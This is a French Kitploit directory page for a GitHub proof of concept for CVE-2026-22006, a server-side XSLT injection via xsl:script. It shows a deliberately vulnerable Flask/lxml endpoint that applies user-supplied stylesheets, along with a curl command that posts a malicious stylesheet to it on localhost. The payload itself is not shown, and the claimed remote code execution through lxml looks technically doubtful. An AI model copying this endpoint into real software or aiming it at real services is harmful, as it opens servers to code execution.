Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-22006-XSLT-Server-Side-Injection-via-xsl-script- — Preuve de concept pour CVE-2026-22006, démontrant une injection XSLT côté serveur via xsl:script dans un point de terminaison Flask basé sur lxml afin de réaliser une exécution de code à distance. | Kitploit
Outils/GitHubGitHub/george0papasotiriou/cve-2026-22006-xslt-server-side-injection-via-xsl-script-
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubgeorge0papasotiriou/cve-2026-22006-xslt-server-side-injection-via-xsl-script-

CVE-2026-22006-XSLT-Server-Side-Injection-via-xsl-script-

Preuve de concept pour CVE-2026-22006, démontrant une injection XSLT côté serveur via xsl:script dans un point de terminaison Flask basé sur lxml afin de réaliser une exécution de code à distance.

Voir le dépôt
3il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-22006 – Injection XSLT côté serveur via xsl:script

Code du programme (Python + XSLT)

root@kitploit:~
# xslt_server.py - Applies user-supplied XSLT to XML
from lxml import etree
from flask import Flask, request

app = Flask(__name__)
@app.route('/transform', methods=['POST'])
def transform():
    xml = request.form['xml']
    xslt = request.form['xslt']
    xml_doc = etree.fromstring(xml.encode())
    xslt_doc = etree.fromstring(xslt.encode())
    transform = etree.XSLT(xslt_doc)
    result = transform(xml_doc)
    return str(result)

if __name__ == '__main__':
    app.run(port=5000)

CVE-2026-22006 – Injection XSLT côté serveur via xsl:script

Severity: Critical

Vue d'ensemble

Un service de transformation XML accepte des feuilles de style XSLT non fiables et les applique sans désactiver les extensions de script. Un attaquant peut intégrer xsl:script ou des fonctions spécifiques au processeur (par exemple, php:function de PHP) pour exécuter du code arbitraire sur le serveur.

Détails de la vulnérabilité

  • Type : Injection de code
  • Impact : Exécution de code à distance.
  • Cause racine : Le processeur XSLT est configuré avec les fonctions d'extension activées, ce qui permet des appels directs aux commandes système.

Démonstration de l'exploit

  1. Démarrer le serveur :
    root@kitploit:~
    pip install flask lxml
    python xslt_server.py
    
  2. Envoyer un XSLT malveillant avec le XML :
    root@kitploit:~
    curl -X POST -d "xml=<root/>" --data-urlencode "[email protected]" http://localhost:5000/transform
    

Le serveur renvoie la sortie de id.

Télécharger l’outil